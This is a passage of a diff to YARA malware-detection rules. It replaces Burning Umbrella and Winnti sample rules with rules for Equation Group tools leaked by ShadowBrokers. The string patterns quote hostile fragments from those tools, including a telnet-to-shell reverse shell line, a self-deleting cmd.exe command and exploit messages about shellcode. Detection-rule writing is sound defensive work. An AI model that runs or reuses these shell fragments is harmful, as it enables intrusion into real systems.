 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_14 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ebbisland : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2b3a4bb-ca60-5dc2-8124-17e654e326b8"
-		date = "2018-05-04"
+		id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L217-L231"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L576-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "37515683804e9aa076a588048713b420501b2aaf6b8617501ef550484abd1c03"
+		logic_hash = "1f4b5054d4239e23146f0764ffe9037b658ecdb9a5f479956c5c45abc1012a17"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "388ef4b4e12a04eab451bd6393860b8d12948f2bce12e5c9022996a9167f4972"
+		hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
 
 	strings:
-		$s1 = "C:\\tmp\\Google_updata.exe" fullword ascii
+		$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
+		$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
+		$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
+		$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
+		$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
+		$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
+		filesize < 250KB and 1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_15 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jackpop : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4dc840c1-e6fa-5b21-bfcd-ef07cd85272a"
-		date = "2018-05-04"
+		id = "7c650752-200b-51e7-95c2-4d385bfd5844"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L233-L248"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L596-L614"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8541231fe1e48d7130aed64eee964f8eda6792b5dd3e708b98e9cc6f1f620cd0"
+		logic_hash = "6efc4ccd2727f93713ad35dc1f054fa25e976e8c3d95f00226fbd56d7f1ce30b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "be6bea22e909bd772d21647ffee6d15e208e386e8c3c95fd22816c6b94196ae8"
-		hash2 = "72a8fa454f428587d210cba0e74735381cd0332f3bdcbb45eecb7e271e138501"
-		hash3 = "9cc38ea106efd5c8e98c2e8faf97c818171c52fa3afa0c4c8f376430fa556066"
-		hash4 = "1a4a64f01b101c16e8b5928b52231211e744e695f125e056ef7a9412da04bb91"
-		hash5 = "3cd42e665e21ed4815af6f983452cbe7a4f2ac99f9ea71af4480a9ebff5aa048"
+		hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
+
+	strings:
+		$x1 = "%x:%d  --> %x:%d %d bytes" fullword ascii
+		$s1 = "client: can't bind to local address, are you root?" fullword ascii
+		$s2 = "Unable to register port" fullword ascii
+		$s3 = "Could not resolve destination" fullword ascii
+		$s4 = "raw troubles" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "cc33b1500354cf785409a3b428f7cd2a"
+		( uint16( 0 ) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_16 : FILE
+rule SIGNATURE_BASE_Equationgroup_Parsescan : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b1970bd-571e-5c53-9170-1605c69d9d6d"
-		date = "2018-05-04"
+		id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L250-L263"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L616-L630"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d0ee163e7f6f04bfe6941575d0916e18ce2e5c2426e0af326c9567560df3122"
+		logic_hash = "25e0bc21f93cd72814cd6114883ed903af84a62dced126201b6037a476dbd2cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "58bb3859e02b8483e9f84cc56fbd964486e056ef28e94dd0027d361383cc4f4a"
+		hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
 
 	strings:
-		$s1 = "http://netimo.net 0" fullword ascii
+		$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
+		$s2 = "Usage:  $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_17 : FILE
+rule SIGNATURE_BASE_Equationgroup_Jscan : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d79d3f65-f27c-582b-9258-7c84dc7682a6"
-		date = "2018-05-04"
+		id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L265-L284"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L632-L646"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ca1dc3a03926af15527d2cb95c87457c285891d42a0aa642f49414153bcfc39e"
+		logic_hash = "d3bbdb90da9fa5b8b41a8b5d35a9b42e4fa15f291146575b0ef22e81441dcbde"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fa380dac35e16da01242e456f760a0e75c2ce9b68ff18cfc7cfdd16b2f4dec56"
-		hash2 = "854b64155f9ceac806b49f3e352949cc292e5bc33f110d965cf81a93f78d2f07"
-		hash3 = "1e462d8968e8b6e8784d7ecd1d60249b41cf600975d2a894f15433a7fdf07a0f"
-		hash4 = "3cdc149e387ec4a64cce1191fc30b8588df4a2947d54127eae43955ce3d08a01"
-		hash5 = "a026b11e15d4a81a449d20baf7cbd7b8602adc2644aa4bea1e55ff1f422c60e3"
+		hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
 
 	strings:
-		$s1 = "syshell" fullword wide
-		$s2 = "Normal.dotm" fullword ascii
-		$s3 = "Microsoft Office Word" fullword ascii
+		$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
+		$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		filesize < 250KB and 1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_18 : FILE
+rule SIGNATURE_BASE_Equationgroup_Promptkill : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d08f4676-ff28-59be-9fd4-b5a824e577d9"
-		date = "2018-05-04"
+		id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L286-L313"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L648-L662"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8ec1a1262874f636906186b569d231d6e3dd97ed6ef5cbddcbaf9f80cee301a0"
+		logic_hash = "7b46161b8cbb9a539171349b3e2a58f8e5a48c344b6d99020b3e96da9c878771"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d8df60524deb6df4f9ddd802037a248f9fbdd532151bb00e647b233e845b1617"
-		hash2 = "c55cb6b42cfabf0edf1499d383817164d1b034895e597068e019c19d787ea313"
-		hash3 = "32144ba8370826e069e5f1b6745a3625d10f50a809f3f2a72c4c7644ed0cab03"
-		hash4 = "ae616003d85a12393783eaff9778aba20189e423c11c852e96c29efa6ecfce81"
-		hash5 = "95b6e427883f402db73234b84a84015ad7f3456801cb9bb19df4b11739ea646d"
-		hash6 = "1419ba36aae1daecc7a81a2dfb96631537365a5b34247533d59a70c1c9f58da2"
-		hash7 = "6a5a9b0ae10ce6a0d5e1f7d21d8ea87894d62d0cda00db005d8d0de17cae7743"
-		hash8 = "74e348068f8851fec1b3de54550fe09d07fb85b7481ca6b61404823b473885bb"
-		hash9 = "adb9c2fe930fae579ce87059b4b9e15c22b6498c42df01db9760f75d983b93b2"
-		hash0 = "23f28b5c4e94d0ad86341c0b9054f197c63389133fcd81dd5e0cf59f774ce54b"
+		hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
 
 	strings:
-		$s1 = "c:\\tmp\\tran.exe" fullword ascii
+		$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
+		$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "11675b4db0e7df7b29b1c1ef6f88e2e1" or pe.imphash ( ) == "364e1f68e2d412db34715709c68ba467" or pe.exports ( "deKernel" ) or 1 of them )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_19 : FILE
+rule SIGNATURE_BASE_Equationgroup_Epoxyresin_V1_0_0 : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8ab55e80-5d28-5a5f-a1cc-725ba6720e4b"
-		date = "2018-05-04"
+		id = "390a13b0-3246-5bf7-8841-775a43045172"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L315-L332"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L664-L681"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "218c16d1b67e3e80dc7fdaf67a869e92b39744cb336e70761ac960da36c00372"
+		logic_hash = "c1cbc18f05b299837463aa27a9c47ea0355ca5974b2c6ab1e0a18cc9ad1b26a1"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "05e2912f2a593ba16a5a094d319d96715cbecf025bf88bb0293caaf6beb8bc20"
-		hash2 = "e7bbdb275773f43c8e0610ad75cfe48739e0a2414c948de66ce042016eae0b2e"
+		hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
 
 	strings:
-		$s1 = "Cryption.dll" fullword ascii
-		$s2 = "tran.exe" fullword ascii
-		$s3 = "Kernel.dll" fullword ascii
-		$s4 = "Now ready to get the file %s!" fullword ascii
+		$x1 = "[-] kernel not vulnerable" fullword ascii
+		$s1 = ".tmp.%d.XXXXXX" fullword ascii
+		$s2 = "[-] couldn't create temp file" fullword ascii
+		$s3 = "/boot/System.map-%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		( uint16( 0 ) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
 }
-
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_20 : FILE
+rule SIGNATURE_BASE_Equationgroup_Estopmoonlit : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a39a76a-31e2-5d6e-82cb-ea38d503b6a9"
-		date = "2018-05-04"
-		modified = "2023-01-06"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L334-L355"
+		id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
+		date = "2017-04-08"
+		modified = "2023-12-05"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L683-L699"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e2739a89451a4eba0bae345203dd4c0e26f715bb079830e36c772861fdd0f4de"
+		logic_hash = "06293b6f48d2595f3426088cddc4b0c4d1ebc1de90fa640d5b5e806a45a2b6bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c12379cd7ab3cb03dac354d0e850769873d45bb486c266a893c0daa452aa03c"
-		hash2 = "172cd90fd9e31ba70e47f0cc76c07d53e512da4cbfd197772c179fe604b75369"
-		hash3 = "1ce88e98c8b37ea68466657485f2c01010a4d4a88587ba0ae814f37680a2e7a8"
+		hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
 
 	strings:
-		$s1 = "Wordpad.Document.1\\shell\\open\\command\\" wide
-		$s2 = "%s\\shell\\Open\\command" fullword wide
-		$s3 = "expanding computer" fullword ascii
+		$x1 = "[+] shellcode prepared, re-executing" fullword ascii
+		$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
+		$x3 = "[-] shell failed" fullword ascii
+		$x4 = "[!] selinux apparently enforcing.  Continue [y|n]? " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "bac338bfe2685483c201e15eae4352d5" or 2 of them )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_21 : FILE
+rule SIGNATURE_BASE_Equationgroup_Envoytomato : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2193e4b6-b71c-5031-8e43-fdd7177ad05c"
-		date = "2018-05-04"
+		id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L357-L376"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L701-L715"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4fdb162575bd108bb35e5c8ed10f7cac7539a15349218222dbb82d8eae8ad4bb"
+		logic_hash = "f15b3b4281ec45a7a71c9bf8b88c60befec665f78b76a615c5912a6b7f94235b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b7b9c2a9d5080ccc4e9934f2fd14b9d4e8f6f500889bf9750f1d672c8724438"
+		hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
 
 	strings:
-		$s1 = "c:\\windows\\ime\\setup.exe" fullword ascii
-		$s2 = "ws.run \"later.bat /start\",0Cet " fullword ascii
-		$s3 = "del later.bat" fullword ascii
-		$s4 = "mycrs.xls" fullword ascii
-		$a1 = "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"" fullword ascii
-		$a2 = "<set ws=wscript.createobject(\"wscript.shell\")" fullword ascii
+		$s1 = "[-] kernel not vulnerable" fullword ascii
+		$s2 = "[-] failed to spawn shell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_22 : FILE
+rule SIGNATURE_BASE_Equationgroup_Smash : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
 		author = "Florian Roth (Nextron Systems)"
-		id = "90c6cda9-95a0-5de7-b1cd-110c238d993d"
-		date = "2018-05-04"
+		id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L378-L395"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L717-L732"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "af2d7917f54ca365465383484b6d19a941d4801898d162a6d3afa7b7c8491a0f"
+		logic_hash = "073496e34dded05be40ee851442f9c0ec998f35e02a5d4221677a195b792f786"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fa116cf9410f1613003ca423ad6ca92657a61b8e9eda1b05caf4f30ca650aee5"
+		hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
 
 	strings:
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\" ascii
-		$s3 = "Content-Disposition: form-data; name=\"txt\"; filename=\"" fullword ascii
-		$s4 = "Fail To Enum Service" fullword ascii
-		$s5 = "Host Power ON Time" fullword ascii
-		$s6 = "%d Hours %2d Minutes %2d Seconds " fullword ascii
+		$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
+		$x2 = "no command given!! bailing..." fullword ascii
+		$x3 = "no port. assuming 22..." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Airdviper_Sample_Apr18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ratload : FILE
 {
 	meta:
-		description = "Detects Arid Viper malware sample"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00f118d1-be1c-5f50-a50f-591f824a1a53"
-		date = "2018-05-04"
+		id = "81590569-e81b-5d97-8295-cc6f018fab98"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L398-L422"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L734-L749"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cbe1f36320eb9640ffbb6495faf7e5a062c5929d022bb56cbf0ebee810ef4e94"
+		logic_hash = "34298175663a01b26e317c31c720f2f4fe93a5c7e375c9642664479d8672e8cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397"
+		hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
 
 	strings:
-		$x1 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del \"%s\"" fullword ascii
-		$x2 = "daenerys=%s&" ascii
-		$x3 = "betriebssystem=%s&anwendung=%s&AV=%s" ascii
-		$s1 = "Taskkill /IM  %s /F &  %s" fullword ascii
-		$s2 = "/api/primewire/%s/requests/macKenzie/delete" fullword ascii
-		$s3 = "\\TaskWindows.exe" ascii
-		$s4 = "MicrosoftOneDrives.exe" fullword ascii
-		$s5 = "\\SeanSansom.txt" ascii
+		$x1 = "/tmp/ratload.tmp.sh" fullword ascii
+		$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
+		$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and ( 1 of ( $x* ) or 4 of them )
+		filesize < 250KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_Winnti_Sample_May18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ys : FILE
 {
 	meta:
-		description = "Detects malware sample from Burning Umbrella report - Generic Winnti Rule"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2f3339e-269f-5a51-8db6-06e54a707b3a"
-		date = "2018-05-04"
+		id = "abd120e7-23f8-530e-b21e-c50a2b571332"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L426-L440"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L751-L766"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e235396de278120cbc4700f239c41e7f21e97ba111c07022ae505de540dda2bc"
+		logic_hash = "4962cc732ce3dea6dc52c7d91ce94089eb4498ba4c442ecc6363ea75de47de31"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41"
+		hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
 
 	strings:
-		$s1 = "wireshark" fullword wide
-		$s2 = "procexp" fullword wide
+		$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
+		$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
+		$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		filesize < 250KB and 1 of them
 }
-
-rule SIGNATURE_BASE_MAL_Visel_Sample_May18_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ewok : FILE
 {
 	meta:
-		description = "Detects Visel malware sample from Burning Umbrella report"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a244461a-380c-56e6-a891-131f6e13c280"
-		date = "2018-05-04"
+		id = "379c233f-86f8-5116-a15c-8a80b27daea6"
+		date = "2017-04-08"
 		modified = "2023-12-05"
-		reference = "https://401trg.pw/burning-umbrella/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L442-L460"
+		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L768-L784"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3200e3224e037a116451b09ce265c1794a05406876376531ac81eb720fcb6945"
+		logic_hash = "d10d75885daa8cd20e5d7d7e142d1e7a2dbc10a50debf7892629f67b948bbdbe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35db8e6a2eb5cf09cd98bf5d31f6356d0deaf4951b353fc513ce98918b91439c"
+		hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
 
 	strings:
-		$s2 = "print32.dll" fullword ascii
-		$s3 = "c:\\a\\b.txt" fullword ascii
-		$s4 = "\\temp\\s%d.dat" wide
+		$x1 = "Example: ewok -t target public" fullword ascii
+		$x2 = "Usage:  cleaner host community fake_prog" fullword ascii
+		$x3 = "-g  - Subset of -m that Green Spirit hits " fullword ascii
+		$x4 = "--- ewok version" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.exports ( "szFile" ) or 2 of them )
+		( uint16( 0 ) == 0x457f and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_MAL_Nighthawk_Nov_2022_1 : NIGHTHAWK BEACON FILE
+rule SIGNATURE_BASE_Equationgroup_Xspy : FILE
 {
 	meta:
-		description = "Detect the Nighthawk dropped beacon"
-		author = "Arkbird_SOLG"
-		id = "a46d5034-e8e3-5c30-90d9-ea97b8384341"
-		date = "2022-11-22"
+		description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
+		date = "2017-04-08"
 		modified = "2023-12-05"
